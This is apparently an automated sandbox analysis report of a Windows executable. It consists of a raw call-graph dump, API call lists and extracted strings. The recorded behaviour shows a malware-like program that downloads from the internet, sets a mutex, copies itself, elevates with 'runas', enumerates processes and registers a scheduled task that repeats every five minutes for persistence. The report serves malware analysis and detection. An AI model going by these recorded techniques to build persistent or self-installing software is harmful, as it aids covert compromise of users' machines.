59 API calls 45010->45419 45011->44884 45012 41b379 45428 413100 59 API calls 45012->45428 45014 41b3a5 45429 413580 59 API calls 45014->45429 45016 41b48b 45435 41fdc0 CreateThread 45016->45435 45018 41b49f GetMessageW 45019 41b4ed 45018->45019 45020 41b4bf 45018->45020 45023 41b502 PostThreadMessageW 45019->45023 45024 41b55b 45019->45024 45021 41b4c5 TranslateMessage DispatchMessageW GetMessageW 45020->45021 45021->45019 45021->45021 45025 41b510 PeekMessageW 45023->45025 45026 41b564 PostThreadMessageW 45024->45026 45027 41b5bb 45024->45027 45029 41b546 WaitForSingleObject 45025->45029 45030 41b526 DispatchMessageW PeekMessageW 45025->45030 45028 41b570 PeekMessageW 45026->45028 45027->45011 45033 41b5d2 CloseHandle 45027->45033 45031 41b5a6 WaitForSingleObject 45028->45031 45032 41b586 DispatchMessageW PeekMessageW 45028->45032 45029->45024 45029->45025 45030->45029 45030->45030 45031->45027 45031->45028 45032->45031 45032->45032 45033->45011 45038 41b3b3 45038->45016 45430 41c330 59 API calls 45038->45430 45431 41c240 59 API calls 45038->45431 45432 41b8b0 59 API calls 45038->45432 45433 413260 59 API calls 45038->45433 45434 41fa10 CreateThread 45038->45434 45725 427e0e 45039->45725 45041 427f4c 45041->44706 45042->44679 45043->44683 45044->44690 45048->44709 45049->44715 45050->44717 45051->44721 45052->44722 45054 428c9d 45053->45054 45056 425179 45054->45056 45058 428cbb 45054->45058 45062 43b813 45054->45062 45056->44726 45059 432553 TlsSetValue 45056->45059 45058->45054 45058->45056 45070 4329c9 Sleep 45058->45070 45059->44729 45060->44733 45061->44730 45063 43b81e 45062->45063 45068 43b839 45062->45068 45064 43b82a 45063->45064 45063->45068 45071 425208 58 API calls __getptd_noexit 45064->45071 45066 43b849 HeapAlloc 45066->45068 45069 43b82f 45066->45069 45068->45066 45068->45069 45072 42793d DecodePointer 45068->45072 45069->45054 45070->45058 45071->45069 45072->45068 45074 428b1b EnterCriticalSection 45073->45074 45075 428b08 45073->45075 45074->44737 45083 428b9f 58 API calls 8 library calls 45075->45083 45077 428b0e 45077->45074 45084 427c2e 58 API calls 3 library calls 45077->45084 45080->44749 45081->44750 45082->44741 45083->45077 45087 428cec 45085->45087 45088 428d1e 45087->45088 45090 428cff 45087->45090 45091 420c62 45087->45091 45088->44757 45090->45087 45090->45088 45108 4329c9 Sleep 45090->45108 45092 420cdd 45091->45092 45100 420c6e 45091->45100 45117 42793d DecodePointer 45092->45117 45094 420ce3 45118 425208 58 API calls __getptd_noexit 45094->45118 45097 420ca1 RtlAllocateHeap 45097->45100 45107 420cd5 45097->45107 45099 420cc9 45115 425208 58 API calls __getptd_noexit 45099->45115 45100->45097 45100->45099 45104 420cc7 45100->45104 45105 420c79 45100->45105 45114 42793d DecodePointer 45100->45114 45116 425208 58 API calls __getptd_noexit 45104->45116 45105->45100 45109 427f51 58 API calls __NMSG_WRITE 45105->45109 45110 427fae 58 API calls 3 library calls 45105->45110 45111 427b0b 45105->45111 45107->45087 45108->45090 45109->45105 45110->45105 45119 427ad7 GetModuleHandleExW 45111->45119 45114->45100 45115->45104 45116->45107 45117->45094 45118->45107 45120 427af0 GetProcAddress 45119->45120 45121 427b07 ExitProcess 45119->45121 45120->45121 45122 427b02 45120->45122 45122->45121 45123->44773 45124->44768 45125->44768 45126->44776 45128 43aeb8 EncodePointer 45127->45128 45128->45128 45129 43aed2 45128->45129 45129->44780 45130->44782 45132 40cf32 _memset __ftell_nolock 45131->45132 45133 40cf4f InternetOpenW 45132->45133 45134 415c10 59 API calls 45133->45134 45135 40cf8a InternetOpenUrlW 45134->45135 45136 40cfb9 InternetReadFile InternetCloseHandle InternetCloseHandle 45135->45136 45142 40cfb2 45135->45142 45438 4156d0 45136->45438 45138 4156d0 59 API calls 45140 40d049 45138->45140 45139 40d000 45139->45138 45140->45142 45457 413010 59 API calls 45140->45457 45142->44786 45143 40d084 45143->45142 45458 413010 59 API calls 45143->45458 45463 41ccc0 45145->45463 45483 41cc50 45148->45483 45151 41a04d 45151->44798 45151->44803 45154 413ab2 45153->45154 45162 413ad0 GetModuleFileNameW PathRemoveFileSpecW 45153->45162 45155 413b00 45154->45155 45156 413aba 45154->45156 45491 44f23e 59 API calls 2 library calls 45155->45491 45157 423b4c 59 API calls 45156->45157 45159 413ac7 45157->45159 45159->45162 45492 44f1bb 59 API calls 3 library calls 45159->45492 45163 418400 45162->45163 45164 418437 45163->45164 45168 418446 45163->45168 45164->45168 45493 415d50 59 API calls ___check_float_string 45164->45493 45165 4184b9 45165->44811 45168->45165 45494 418d50 59 API calls 45168->45494 45495 431781 45169->45495 45513 42f7c0 45172->45513 45175 411d20 _memset 45176 411d40 RegQueryValueExW RegCloseKey 45175->45176 45177 411d8f 45176->45177 45177->45177 45178 415c10 59 API calls 45177->45178 45179 411dbf 45178->45179 45180 411dd1 lstrlenA 45179->45180 45181 411e7c 45179->45181 45515 413520 59 API calls 45180->45515 45182 411e94 6 API calls 45181->45182 45185 411ef5 UuidCreate UuidToStringW 45182->45185 45184 411df1 45186 411e3c PathFileExistsW 45184->45186 45187 411e00 45184->45187 45188 411f36 45185->45188 45186->45181 45189 411e52 45186->45189 45187->45184 45187->45186 45188->45188 45191 415c10 59 API calls 45188->45191 45190 411e6a 45189->45190 45193 414690 59 API calls 45189->45193 45199 4121d1 45190->45199 45192 411f59 RpcStringFreeW PathAppendW CreateDirectoryW 45191->45192 45194 411f98 45192->45194 45196 411fce 45192->45196 45193->45190 45195 415c10 59 API calls 45194->45195 45195->45196 45197 415c10 59 API calls 45196->45197 45198 41201f PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 45197->45198 45198->45199 45200 41207c _memset 45198->45200 45199->44840 45201 412095 6 API calls 45200->45201 45202 412115 _memset 45201->45202 45203 412109 45201->45203 45205 412125 SetLastError lstrcpyW lstrcatW lstrcatW CreateProcessW 45202->45205 45516 413260 59 API calls 45203->45516 45206 4121b2 45205->45206 45207 4121aa GetLastError 45205->45207 45208 4121c0 WaitForSingleObject 45206->45208 45207->45199 45208->45199 45208->45208 45210 42f7c0 __ftell_nolock 45209->45210 45211 41222d 7 API calls 45210->45211 45212 4122bd K32EnumProcesses 45211->45212 45213 41228c LoadLibraryW GetProcAddress GetProcAddress GetProcAddress 45211->45213 45214 4122d3 45212->45214 45216 4122df 45212->45216 45213->45212 45214->44814 45215 412353 45215->44814 45216->45215 45217 4122f0 OpenProcess 45216->45217 45218 412346 CloseHandle 45217->45218 45219 41230a K32EnumProcessModules 45217->45219 45218->45215 45218->45217 45219->45218 45220 41231c K32GetModuleBaseNameW 45219->45220 45517 420235 45220->45517 45222 41233e 45222->45218 45223 412345 45222->45223 45223->45218 45225 420c62 _malloc 58 API calls 45224->45225 45228 40ef6e _memset 45225->45228 45226 40efdc 45226->44819 45227 420c62 _malloc 58 API calls 45227->45228 45228->45226 45228->45227 45228->45228 45230 413f05 45229->45230 45234 413eae 45229->45234 45231 413fb1 45230->45231 45232 413f18 45230->45232 45533 44f23e 59 API calls 2 library calls 45231->45533 45235 413fbb 45232->45235 45236 413f2d 45232->45236 45237 413f3d ___check_float_string 45232->45237 45234->45230 45241 413ed4 45234->45241 45534 44f23e 59 API calls 2 library calls 45235->45534 45236->45237 45532 416760 59 API calls 2 library calls 45236->45532 45237->44819 45243 413ed9 45241->45243 45244 413eef 45241->45244 45530 413da0 59 API calls ___check_float_string 45243->45530 45531 413da0 59 API calls ___check_float_string 45244->45531 45248 413ee9 45248->44819 45249 413eff 45249->44819 45251 4146a9 45250->45251 45252 41478c 45250->45252 45253 4146b6 45251->45253 45254 4146e9 45251->45254 45537 44f26c 59 API calls 3 library calls 45252->45537 45256 4146c2 45253->45256 45257 414796 45253->45257 45258 4147a0 45254->45258 45259 4146f5 45254->45259 45535 413340 59 API calls _memmove 45256->45535 45538 44f26c 59 API calls 3 library calls 45257->45538 45539 44f23e 59 API calls 2 library calls 45258->45539 45271 414707 ___check_float_string 45259->45271 45536 416950 59 API calls 2 library calls 45259->45536 45267 4146e0 45267->44834 45271->44834 45274 40d27d CoInitializeSecurity 45273->45274 45280 40d276 45273->45280 45275 414690 59 API calls 45274->45275 45276 40d2b8 CoCreateInstance 45275->45276 45277 40d2e3 VariantInit VariantInit VariantInit VariantInit 45276->45277 45278 40da3c CoUninitialize 45276->45278 45279 40d38e VariantClear VariantClear VariantClear VariantClear 45277->45279 45278->45280 45281 40d3e2 45279->45281 45282 40d3cc CoUninitialize 45279->45282 45280->44860 45540 40b140 45281->45540 45282->45280 45285 40d3f6 45545 40b1d0 45285->45545 45287 40d422 45288 40d426 CoUninitialize 45287->45288 45289 40d43c 45287->45289 45288->45280 45290 40b140 60 API calls 45289->45290 45292 40d449 45290->45292 45293 40b1d0 SysFreeString 45292->45293 45294 40d471 45293->45294 45295 40d496 CoUninitialize 45294->45295 45296 40d4ac 45294->45296 45295->45280 45298 40b140 60 API calls 45296->45298 45353 40d8cf 45296->45353 45299 40d4d5 45298->45299 45300 40b1d0 SysFreeString 45299->45300 45301 40d4fd 45300->45301 45302 40b140 60 API calls 45301->45302 45301->45353 45303 40d5ae 45302->45303 45304 40b1d0 SysFreeString 45303->45304 45305 40d5d6 45304->45305 45306 40b140 60 API calls 45305->45306 45305->45353 45307 40d679 45306->45307 45308 40b1d0 SysFreeString 45307->45308 45309 40d6a1 45308->45309 45310 40b140 60 API calls 45309->45310 45309->45353 45311 40d6b6 45310->45311 45312 40b1d0 SysFreeString 45311->45312 45313 40d6de 45312->45313 45314 40b140 60 API calls 45313->45314 45313->45353 45315 40d707 45314->45315 45316 40b1d0 SysFreeString 45315->45316 45317 40d72f 45316->45317 45318 40b140 60 API calls 45317->45318 45317->45353 45319 40d744 45318->45319 45320 40b1d0 SysFreeString 45319->45320 45321 40d76c 45320->45321 45321->45353 45549 423aaf GetSystemTimeAsFileTime 45321->45549 45323 40d77d 45551 423551 45323->45551 45328 412c40 59 API calls 45329 40d7b5 45328->45329 45330 412900 60 API calls 45329->45330 45331 40d7c3 45330->45331 45332 40b140 60 API calls 45331->45332 45333 40d7db 45332->45333 45334 40b1d0 SysFreeString 45333->45334 45335 40d7ff 45334->45335 45336 40b140 60 API calls 45335->45336 45335->45353 45337 40d8a3 45336->45337 45338 40b1d0 SysFreeString 45337->45338 45339 40d8cb 45338->45339 45340 40b140 60 API calls 45339->45340 45339->45353 45341 40d8ea 45340->45341 45342 40b1d0 SysFreeString 45341->45342 45343 40d912 45342->45343 45343->45353 45559 40b400 SysAllocString 45343->45559 45345 40d936 VariantInit VariantInit 45346 40b140 60 API calls 45345->45346 45347 40d985 45346->45347 45348 40b1d0 SysFreeString 45347->45348 45349 40d9e7 VariantClear VariantClear VariantClear 45348->45349 45350 40da10 45349->45350 45351 40da46 CoUninitialize 45349->45351 45563 42052a 78 API calls vswprintf 45350->45563 45351->45280 45353->45278 45355->44793 45356->44837 45357->44838 45358->44874 45359->44877 45361 415c66 45360->45361 45366 415c1e 45360->45366 45362 415c76 45361->45362 45363 415cff 45361->45363 45370 415c88 ___check_float_string 45362->45370 45719 416950 59 API calls 2 library calls 45362->45719 45720 44f23e 59 API calls 2 library calls 45363->45720 45366->45361 45371 415c45 45366->45371 45370->44881 45373 414690 59 API calls 45371->45373 45374 415c60 45373->45374 45374->44881 45375->44883 45376->44886 45377->44892 45378->44902 45380 413a90 59 API calls 45379->45380 45381 41294c MultiByteToWideChar 45380->45381 45382 418400 59 API calls 45381->45382 45383 41298d 45382->45383 45383->44905 45384->44910 45385->44918 45386->44924 45387->44928 45388->44932 45389->44936 45390->44940 45391->44944 45392->44948 45393->44950 45394->44952 45395->44954 45396->44956 45397->44958 45398->44960 45399->44962 45400->44964 45401->44966 45402->44968 45403->44970 45404->44972 45405->44974 45406->44976 45407->44978 45408->44980 45410 412c71 45409->45410 45411 412c5f 45409->45411 45414 4156d0 59 API calls 45410->45414 45412 4156d0 59 API calls 45411->45412 45413 412c6a 45412->45413 45413->44985 45415 412c8a 45414->45415 45415->44985 45416->44987 45417->45010 45418->45010 45419->45010 45420->44991 45421->44993 45422->44996 45423->44999 45424->45002 45425->45004 45426->45007 45427->45012 45428->45014 45429->45038 45430->45038 45431->45038 45432->45038 45433->45038 45434->45038 45721 41f130 218 API calls _LanguageEnumProc@4 45434->45721 45435->45018 45722 41fd80 64 API calls 45435->45722 45439 415735 45438->45439 45444 4156de 45438->45444 45440 4157bc 45439->45440 45441 41573e 45439->45441 45462 44f23e 59 API calls 2 library calls 45440->45462 45450 415750 ___check_float_string 45441->45450 45461 416760 59 API calls 2 library calls 45441->45461 45444->45439 45448 415704 45444->45448 45451 415709 45448->45451 45452 41571f 45448->45452 45450->45139 45459 413ff0 59 API calls ___check_float_string 45451->45459 45460 413ff0 59 API calls ___check_float_string 45452->45460 45455 41572f 45455->45139 45456 415719 45456->45139 45457->45143 45458->45142 45459->45456 45460->45455 45461->45450 45469 423b4c 45463->45469 45465 41ccca 45468 41a00a 45465->45468 45479 44f1bb 59 API calls 3 library calls 45465->45479 45468->44795 45468->44796 45473 423b54 45469->45473 45470 420c62 _malloc 58 API calls 45470->45473 45471 423b6e 45471->45465 45473->45470 45473->45471 45474 423b72 std::exception::exception 45473->45474 45480 42793d DecodePointer 45473->45480 45481 430eca RaiseException 45474->45481 45476 423b9c 45482 430d91 58 API calls _free 45476->45482 45478 423bae 45478->45465 45480->45473 45481->45476 45482->45478 45484 423b4c 59 API calls 45483->45484 45485 41cc5d 45484->45485 45487 41cc64 45485->45487 45490 44f1bb 59 API calls 3 library calls 45485->45490 45487->45151 45489 41d740 59 API calls 45487->45489 45489->45151 45493->45168 45494->45168 45498 431570 45495->45498 45499 431580 45498->45499 45500 431586 45499->45500 45505 4315ae 45499->45505 45509 425208 58 API calls __getptd_noexit 45500->45509 45502 43158b 45510 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 45502->45510 45506 4315cf wcstoxq 45505->45506 45511 42e883 GetStringTypeW 45505->45511 45508 41a36e lstrcpyW lstrcpyW 45506->45508 45512 425208 58 API calls __getptd_noexit 45506->45512 45508->44829 45509->45502 45510->45508 45511->45505 45512->45508 45514 411cf2 RegOpenKeyExW 45513->45514 45514->45175 45514->45199 45515->45184 45516->45202 45518 420241 45517->45518 45519 4202b6 45517->45519 45522 420266 45518->45522 45527 425208 58 API calls __getptd_noexit 45518->45527 45529 4202c8 60 API calls 3 library calls 45519->45529 45521 4202c3 45521->45222 45522->45222 45524 42024d 45528 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 45524->45528 45526 420258 45526->45222 45527->45524 45528->45526 45529->45521 45530->45248 45531->45249 45532->45237 45535->45267 45536->45271 45537->45257 45538->45258 45541 423b4c 59 API calls 45540->45541 45542 40b164 45541->45542 45543 40b177 SysAllocString 45542->45543 45544 40b194 45542->45544 45543->45544 45544->45285 45546 40b1de 45545->45546 45548 40b202 45545->45548 45547 40b1f5 SysFreeString 45546->45547 45546->45548 45547->45548 45548->45287 45550 423add __aulldiv 45549->45550 45550->45323 45564 43035d 45551->45564 45553 42355a 45555 40d78f 45553->45555 45572 423576 45553->45572 45556 4228e0 45555->45556 45674 42279f 45556->45674 45560 40b423 45559->45560 45561 40b41d 45559->45561 45562 40b42d VariantClear 45560->45562 45561->45345 45562->45345 45563->45353 45605 42501f 58 API calls 4 library calls 45564->45605 45566 430369 45569 43038d 45566->45569 45606 425208 58 API calls __getptd_noexit 45566->45606 45567 430363 45567->45566 45567->45569 45571 428cde __malloc_crt 58 API calls 45567->45571 45569->45553 45570 43036e 45570->45553 45571->45566 45573 423591 45572->45573 45574 4235a9 _memset 45572->45574 45615 425208 58 API calls __getptd_noexit 45573->45615 45574->45573 45581 4235c0 45574->45581 45576 423596 45616 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 45576->45616 45578 4235cb 45617 425208 58 API calls __getptd_noexit 45578->45617 45579 4235e9 45607 42fb64 45579->45607 45581->45578 45581->45579 45583 4235ee 45618 42f803 58 API calls __cftoa_l 45583->45618 45585 4235f7 45586 4237e5 45585->45586 45619 42f82d 58 API calls __cftoa_l 45585->45619 45632 4242fd 8 API calls 2 library calls 45586->45632 45589 423609 45589->45586 45620 42f857 45589->45620 45590 4237ef 45592 42361b 45592->45586 45593 423624 45592->45593 45594 42369b 45593->45594 45596 423637 45593->45596 45630 42f939 58 API calls 4 library calls 45594->45630 45627 42f939 58 API calls 4 library calls 45596->45627 45597 4236a2 45604 4235a0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 45597->45604 45631 42fbb4 58 API calls 4 library calls 45597->45631 45599 42364f 45599->45604 45628 42fbb4 58 API calls 4 library calls 45599->45628 45602 423668 45602->45604 45629 42f939 58 API calls 4 library calls 45602->45629 45604->45555 45605->45567 45606->45570 45608 42fb70 _setvbuf 45607->45608 45609 42fba5 _setvbuf 45608->45609 45610 428af7 __lock 58 API calls 45608->45610 45609->45583 45611 42fb80 45610->45611 45612 42fb93 45611->45612 45633 42fe47 45611->45633 45662 42fbab LeaveCriticalSection _doexit 45612->45662 45615->45576 45616->45604 45617->45604 45618->45585 45619->45589 45621 42f861 45620->45621 45622 42f876 45620->45622 45672 425208 58 API calls __getptd_noexit 45621->45672 45622->45592 45624 42f866 45673 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 45624->45673 45626 42f871 45626->45592 45627->45599 45628->45602 45629->45604 45630->45597 45631->45604 45632->45590 45634 42fe53 _setvbuf 45633->45634 45635 428af7 __lock 58 API calls 45634->45635 45636 42fe71 __tzset_nolock 45635->45636 45637 42f857 __tzset_nolock 58 API calls 45636->45637 45638 42fe86 45637->45638 45649 42ff25 __tzset_nolock 45638->45649 45663 42f803 58 API calls __cftoa_l 45638->45663 45641 42fe98 45641->45649 45664 42f82d 58 API calls __cftoa_l 45641->45664 45642 42ff71 GetTimeZoneInformation 45642->45649 45645 42feaa 45645->45649 45665 433f99 58 API calls 2 library calls 45645->45665 45646 42ffd8 WideCharToMultiByte 45646->45649 45648 42feb8 45666 441667 78 API calls 3 library calls 45648->45666 45649->45642 45649->45646 45650 430010 WideCharToMultiByte 45649->45650 45655 43ff8e 58 API calls __tzset_nolock 45649->45655 45660 423c2d 61 API calls __tzset_nolock 45649->45660 45661 430157 __tzset_nolock _setvbuf 45649->45661 45669 4242fd 8 API calls 2 library calls 45649->45669 45670 420bed 58 API calls 2 library calls 45649->45670 45671 4300d7 LeaveCriticalSection _doexit 45649->45671 45650->45649 45653 42ff0c _strlen 45656 428cde __malloc_crt 58 API calls 45653->45656 45654 42fed9 ___TypeMatch 45654->45649 45654->45653 45667 420bed 58 API calls 2 library calls 45654->45667 45655->45649 45658 42ff1a _strlen 45656->45658 45658->45649 45668 42c0fd 58 API calls __cftoa_l 45658->45668 45660->45649 45661->45612 45662->45609 45663->45641 45664->45645 45665->45648 45666->45654 45667->45653 45668->45649 45669->45649 45670->45649 45671->45649 45672->45624 45673->45626 45701 42019c 45674->45701 45677 4227d4 45709 425208 58 API calls __getptd_noexit 45677->45709 45679 4227d9 45710 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 45679->45710 45680 4227e9 MultiByteToWideChar 45682 422804 GetLastError 45680->45682 45683 422815 45680->45683 45711 4251e7 58 API calls 3 library calls 45682->45711 45686 428cde __malloc_crt 58 API calls 45683->45686 45684 40d7a3 45684->45328 45688 42281d 45686->45688 45687 422810 45714 420bed 58 API calls 2 library calls 45687->45714 45688->45687 45689 422825 MultiByteToWideChar 45688->45689 45689->45682 45691 42283f 45689->45691 45693 428cde __malloc_crt 58 API calls 45691->45693 45692 4228a0 45715 420bed 58 API calls 2 library calls 45692->45715 45695 42284a 45693->45695 45695->45687 45712 42d51e 88 API calls 3 library calls 45695->45712 45697 422866 45697->45687 45698 42286f WideCharToMultiByte 45697->45698 45698->45687 45699 42288b GetLastError 45698->45699 45713 4251e7 58 API calls 3 library calls 45699->45713 45702 4201ad 45701->45702 45708 4201fa 45701->45708 45716 425007 58 API calls 2 library calls 45702->45716 45704 4201b3 45705 4201da 45704->45705 45717 4245dc 58 API calls 6 library calls 45704->45717 45705->45708 45718 42495e 58 API calls 6 library calls 45705->45718 45708->45677 45708->45680 45709->45679 45710->45684 45711->45687 45712->45697 45713->45687 45714->45692 45715->45684 45716->45704 45717->45705 45718->45708 45719->45370 45726 427e1a _setvbuf 45725->45726 45727 428af7 __lock 51 API calls 45726->45727 45728 427e21 45727->45728 45729 427eda _doexit 45728->45729 45730 427e4f DecodePointer 45728->45730 45745 427f28 45729->45745 45730->45729 45732 427e66 DecodePointer 45730->45732 45738 427e76 45732->45738 45734 427f37 _setvbuf 45734->45041 45736 427e83 EncodePointer 45736->45738 45737 427f1f 45739 427b0b __mtinitlocknum 3 API calls 45737->45739 45738->45729 45738->45736 45740 427e93 DecodePointer EncodePointer 45738->45740 45741 427f28 45739->45741 45743 427ea5 DecodePointer DecodePointer 45740->45743 45742 427f35 45741->45742 45750 428c81 LeaveCriticalSection 45741->45750 45742->45041 45743->45738 45746 427f08 45745->45746 45747 427f2e 45745->45747 45746->45734 45749 428c81 LeaveCriticalSection 45746->45749 45751 428c81 LeaveCriticalSection 45747->45751 45749->45737 45750->45742 45751->45746
            APIs
              • Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
              • Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
              • Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
            • GetCurrentProcess.KERNEL32 ref: 00419FC4
            • GetLastError.KERNEL32 ref: 00419FD2
            • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
            • GetLastError.KERNEL32 ref: 00419FE4
            • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,0076B038,?), ref: 0041A0BB
            • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
            • GetCommandLineW.KERNEL32(?,?), ref: 0041A161
              • Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
              • Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
              • Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
            • String ID: IsNotAutoStart$ IsNotTask$%username%$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
            • API String ID: 2957410896-3144399390
            • Opcode ID: 5654f1f0d8902897548b635c0c3de12d41863b9e7f9f148f59327b5af1546f90
            • Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
            • Opcode Fuzzy Hash: 5654f1f0d8902897548b635c0c3de12d41863b9e7f9f148f59327b5af1546f90
            • Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 688 40d240-40d274 CoInitialize 689 40d276-40d278 688->689 690 40d27d-40d2dd CoInitializeSecurity call 414690 CoCreateInstance 688->690 691 40da8e-40da92 689->691 697 40d2e3-40d3ca VariantInit * 4 VariantClear * 4 690->697 698 40da3c-40da44 CoUninitialize 690->698 693 40da94-40da9c call 422587 691->693 694 40da9f-40dab1 691->694 693->694 704 40d3e2-40d3fe call 40b140 697->704 705 40d3cc-40d3dd CoUninitialize 697->705 700 40da69-40da6d 698->700 702 40da7a-40da8a 700->702 703 40da6f-40da77 call 422587 700->703 702->691 703->702 711 40d400-40d402 704->711 712 40d404 704->712 705->700 713 40d406-40d424 call 40b1d0 711->713 712->713 717 40d426-40d437 CoUninitialize 713->717 718 40d43c-40d451 call 40b140 713->718 717->700 722 40d453-40d455 718->722 723 40d457 718->723 724 40d459-40d494 call 40b1d0 722->724 723->724 730 40d496-40d4a7 CoUninitialize 724->730 731 40d4ac-40d4c2 724->731 730->700 734 40d4c8-40d4dd call 40b140 731->734 735 40da2a-40da37 731->735 739 40d4e3 734->739 740 40d4df-40d4e1 734->740 735->698 741 40d4e5-40d508 call 40b1d0 739->741 740->741 741->735 746 40d50e-40d524 741->746 746->735 748 40d52a-40d542 746->748 748->735 751 40d548-40d55e 748->751 751->735 753 40d564-40d57c 751->753 753->735 756 40d582-40d59b 753->756 756->735 758 40d5a1-40d5b6 call 40b140 756->758 761 40d5b8-40d5ba 758->761 762 40d5bc 758->762 763 40d5be-40d5e1 call 40b1d0 761->763 762->763 763->735 768 40d5e7-40d5fd 763->768 768->735 770 40d603-40d626 768->770 770->735 773 40d62c-40d651 770->773 773->735 776 40d657-40d666 773->776 776->735 778 40d66c-40d681 call 40b140 776->778 781 40d683-40d685 778->781 782 40d687 778->782 783 40d689-40d6a3 call 40b1d0 781->783 782->783 783->735 787 40d6a9-40d6be call 40b140 783->787 790 40d6c0-40d6c2 787->790 791 40d6c4 787->791 792 40d6c6-40d6e0 call 40b1d0 790->792 791->792 792->735 796 40d6e6-40d6f4 792->796 796->735 798 40d6fa-40d70f call 40b140 796->798 801 40d711-40d713 798->801 802 40d715 798->802 803 40d717-40d731 call 40b1d0 801->803 802->803 803->735 807 40d737-40d74c call 40b140 803->807 810 40d752 807->810 811 40d74e-40d750 807->811 812 40d754-40d76e call 40b1d0 810->812 811->812 812->735 816 40d774-40d7ce call 423aaf call 423551 call 4228e0 call 412c40 call 412900 812->816 827 40d7d0 816->827 828 40d7d2-40d7e3 call 40b140 816->828 827->828 831 40d7e5-40d7e7 828->831 832 40d7e9 828->832 833 40d7eb-40d819 call 40b1d0 call 413210 831->833 832->833 833->735 840 40d81f-40d835 833->840 840->735 842 40d83b-40d85e 840->842 842->735 845 40d864-40d889 842->845 845->735 848 40d88f-40d8ab call 40b140 845->848 851 40d8b1 848->851 852 40d8ad-40d8af 848->852 853 40d8b3-40d8cd call 40b1d0 851->853 852->853 857 40d8dd-40d8f2 call 40b140 853->857 858 40d8cf-40d8d8 853->858 862 40d8f4-40d8f6 857->862 863 40d8f8 857->863 858->735 864 40d8fa-40d91d call 40b1d0 862->864 863->864 864->735 869 40d923-40d98d call 40b400 VariantInit * 2 call 40b140 864->869 874 40d993 869->874 875 40d98f-40d991 869->875 876 40d995-40da0e call 40b1d0 VariantClear * 3 874->876 875->876 880 40da10-40da27 call 42052a 876->880 881 40da46-40da67 CoUninitialize 876->881 880->735 881->700
            APIs
            • CoInitialize.OLE32(00000000), ref: 0040D26C
            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0040D28F
            • CoCreateInstance.OLE32(004D506C,00000000,00000001,004D4FEC,?,?,00000000,000000FF), ref: 0040D2D5
            • VariantInit.OLEAUT32(?), ref: 0040D2F0
            • VariantInit.OLEAUT32(?), ref: 0040D309
            • VariantInit.OLEAUT32(?), ref: 0040D322
            • VariantInit.OLEAUT32(?), ref: 0040D33B
            • VariantClear.OLEAUT32(?), ref: 0040D397
            • VariantClear.OLEAUT32(?), ref: 0040D3A4
            • VariantClear.OLEAUT32(?), ref: 0040D3B1
            • VariantClear.OLEAUT32(?), ref: 0040D3C2
            • CoUninitialize.OLE32 ref: 0040D3D5
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
            • String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
            • API String ID: 2496729271-1738591096
            • Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
            • Instruction ID: 4ad9c2e8017b41c765d67f99bb49247a0c13fc41f24acee5688789d455a97b09
            • Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
